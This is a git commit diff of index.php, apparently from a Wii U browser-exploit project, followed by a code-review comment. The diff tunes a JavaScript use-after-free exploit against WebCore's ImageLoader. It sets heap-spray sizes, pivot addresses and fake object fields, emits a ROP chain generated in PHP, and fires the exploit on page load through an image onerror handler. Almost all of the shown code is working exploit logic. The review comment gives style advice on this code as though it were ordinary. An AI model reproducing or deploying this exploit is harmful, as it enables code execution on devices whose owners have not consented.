Move a bunch of settings to the php section
Tweaked some values, added comments, and fixed ROP building by adding the missing "$generatebinrop = 1;".
This commit is contained in:
parent
0867385e16
commit
005ca5a692
38
index.php
38
index.php
|
@ -10,13 +10,20 @@ function hexentities($str) {
|
||||||
|
|
||||||
// Settings
|
// Settings
|
||||||
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
|
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
|
||||||
$payload_size = 0x8000;
|
$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.
|
||||||
$pivotAdressAdress = 0x1B800000; //r6
|
|
||||||
$payload_srcaddr = 0x1D600000;
|
|
||||||
$ROPHEAP = $payload_srcaddr + 0x800000;
|
|
||||||
$ROPCHAIN_JS_VAR = 1;
|
|
||||||
|
|
||||||
$USE_FIXED_PAYLOAD_LEGNTH = 0x400000; // This may be useless, but it worked once.. soo..
|
$pivotAdress = 0x010ADDCC; // don't change this.
|
||||||
|
$payload_size = 0x20000; // the codegen is 128kb max.
|
||||||
|
$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying
|
||||||
|
|
||||||
|
// These values could be adjusted to increase success rate.
|
||||||
|
$payload_srcaddr = 0x1D500000 - 0x00A10000;
|
||||||
|
$payload_spray_size = 0x400000;
|
||||||
|
|
||||||
|
$ROPHEAP = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload
|
||||||
|
|
||||||
|
$ropchainselect = 1; // Put codebin on heap and search it.
|
||||||
|
//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads.
|
||||||
|
|
||||||
/**
|
/**
|
||||||
Expects a wiiuhaxx_common_cfg.php with the following variables
|
Expects a wiiuhaxx_common_cfg.php with the following variables
|
||||||
|
@ -38,20 +45,22 @@ Result: Bug is present, crash
|
||||||
function UaF(a){
|
function UaF(a){
|
||||||
//Warning, the delta was modified !
|
//Warning, the delta was modified !
|
||||||
var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000
|
var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000
|
||||||
var pivotAdress = 0x010ADDCC;
|
var pivotAdress = <?php echo $pivotAdress ?>;
|
||||||
//5.5.2
|
//5.5.2
|
||||||
{
|
{
|
||||||
var pivotAdressAdress = 0x1B800000; //r6
|
var pivotAdressAdress = <?php echo $pivotAdressAdress ?>; //r6
|
||||||
var payloadAdress = 0x1D600000 + delta;
|
var payloadAdress = <?php echo $payload_srcaddr ?> + delta;
|
||||||
}
|
}
|
||||||
|
|
||||||
var codegenAddress = 0x01800000;
|
var codegenAddress = 0x01800000; // don't change this.
|
||||||
var sizeWebCoreImageLoader = 0x18;
|
var sizeWebCoreImageLoader = 0x18; // don't change this.
|
||||||
var sprayCount = 0x1900;
|
|
||||||
|
var payloadsize = <?php echo $payload_size; ?>;
|
||||||
|
var sprayCount = <?php echo $payload_spray_size; ?>/payloadsize;
|
||||||
var _4K = 0x1000;
|
var _4K = 0x1000;
|
||||||
var _16K = 0x4000;
|
var _16K = 0x4000;
|
||||||
var _32K = 0x8000;
|
var _32K = 0x8000;
|
||||||
|
|
||||||
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
||||||
a.type="radio";
|
a.type="radio";
|
||||||
|
|
||||||
|
@ -78,7 +87,6 @@ function UaF(a){
|
||||||
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
||||||
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
||||||
dv.setUint32(0x14, 0x00000000); //padding
|
dv.setUint32(0x14, 0x00000000); //padding
|
||||||
|
|
||||||
|
|
||||||
<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"
|
<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"
|
||||||
|
|
||||||
|
@ -132,4 +140,4 @@ function UaF(a){
|
||||||
}
|
}
|
||||||
</script>
|
</script>
|
||||||
|
|
||||||
<input id="x" type="image" onerror="UaF(this);" src=""/>
|
<input id="x" type="image" onerror="UaF(this);" src=""/>
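Review bot: The new settings block in the first hunk encodes mode selection in integer flags whose meaning lives only in comments: `$generatebinrop = 1;` reads as a boolean but is an int, and `$ropchainselect = 1;` has its alternative documented only by the commented-out `//$ropchainselect = 2;` line. I would write the boolean one as `$generatebinrop = true;` (assuming its consumer, which is outside this hunk, does not compare against the integer) and put one comment at the `$ropchainselect` definition listing the accepted values, e.g. `// $ropchainselect: 1 = codebin placed on the heap and searched at runtime; 2 = codebin embedded in the ROP chain (small payloads only)`. Separately, the context line `$_REQUEST['sysver'] = '550';` overwrites a request superglobal to hard-code a value; a plain variable such as `$sysver = '550';` would make it obvious that no request input is consulted, though that line is untouched by this commit.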
|